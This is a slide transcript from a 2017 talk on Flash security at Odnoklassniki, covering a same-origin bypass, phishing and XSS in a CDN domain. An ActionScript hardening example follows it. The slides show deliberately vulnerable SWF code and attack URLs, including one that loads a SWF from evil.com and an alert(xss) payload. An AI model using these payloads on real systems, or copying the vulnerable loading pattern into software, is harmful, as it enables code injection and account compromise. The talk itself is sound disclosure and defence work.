Flash is dead. Long live Flash!

Flash is dead. Long live Flash! Александра Сватикова, Одноклассники

Posted on 16-Jan-2017

TRANSCRIPT

  • Flash is dead. Long live Flash!

  • Flash

    Application sandbox

    Security domain / application domain

  • #1 Same-Origin Policy bypass (credit: Jakub Żoczek, @zoczus)

    http://st.mycdn.me/vulnerable.swf?conf=config.swf

    loader.load(new URLRequest(loaderInfo.parameters.conf),
                new LoaderContext(false, new ApplicationDomain(), SecurityDomain.currentDomain));
    addChild(loader);

    The conf parameter is passed straight to Loader.load() with SecurityDomain.currentDomain, so a SWF fetched from evil.com runs with the privileges of st.mycdn.me:

    http://st.mycdn.me/vulnerable.swf?conf=http://evil.com/config.swf

    (diagram: evil.com, mycdn.me)

  • #1 Same-Origin Policy bypass (cont.)

    http://ok.ru/crossdomain.xml

    ...

    (diagram: evil.com, ok.ru)

  • #2 Phishing
  • #3 XSS in CDN domain

    http://st.mycdn.me/vulnerable.swf?param=username

    _root.createTextField("Inputbox", 0, 20, 20, 320, 240);
    _root.Inputbox.html = true;
    _root.Inputbox.htmlText = "Welcome " + _root.param;

    http://st.mycdn.me/vulnerable.swf?param=alert(xss)

    The CDN host is also reachable under an ok.ru name:

    $ host st.mycdn.me
    st.mycdn.me has address 217.20.152.226
    $
    $ host videoplayer.ok.ru
    videoplayer.ok.ru is an alias for st.mycdn.me.
    videoplayer.ok.ru has address 217.20.152.226

    http://videoplayer.ok.ru/vulnerable.swf?param=alert(xss)
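A hardened version of the two vulnerable patterns from slides #1 and #3, written in ActionScript 3 and added here as an example; it is not code from the talk or from Odnoklassniki. The class name HardenedShell and the SAFE_CONF allowlist pattern are assumptions; only the conf and param parameter names come from the slides.

```actionscript
package {
    import flash.display.Loader;
    import flash.display.Sprite;
    import flash.net.URLRequest;
    import flash.system.ApplicationDomain;
    import flash.system.LoaderContext;
    import flash.text.TextField;

    // Hypothetical hardened shell SWF (added example, not the talk's code).
    public class HardenedShell extends Sprite {
        // Allowed shape for "conf": a relative path of plain segments ending in
        // .swf; no scheme, no leading "/" or "//", no "..", no query string.
        private static const SAFE_CONF:RegExp = /^[A-Za-z0-9_\-]+(\/[A-Za-z0-9_\-]+)*\.swf$/;

        public function HardenedShell() {
            var params:Object = loaderInfo.parameters;

            // Fix for #1: a relative path is resolved against this SWF's own URL on
            // st.mycdn.me, so http://evil.com/config.swf never reaches Loader.load().
            var conf:String = String(params["conf"]);
            if (SAFE_CONF.test(conf)) {
                var loader:Loader = new Loader();
                // securityDomain left null: the child keeps its own security domain
                // instead of being imported into this SWF's domain.
                var ctx:LoaderContext = new LoaderContext(false, new ApplicationDomain(), null);
                loader.load(new URLRequest(conf), ctx);
                addChild(loader);
            }

            // Fix for #3: render the attacker-reachable value as plain text so any
            // markup in "param" is displayed literally rather than interpreted as HTML.
            var name:String = params["param"] is String ? params["param"] : "";
            var tf:TextField = new TextField();
            tf.x = 20; tf.y = 20; tf.width = 320; tf.height = 240;
            tf.text = "Welcome " + name;
            addChild(tf);
        }
    }
}
```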

  • !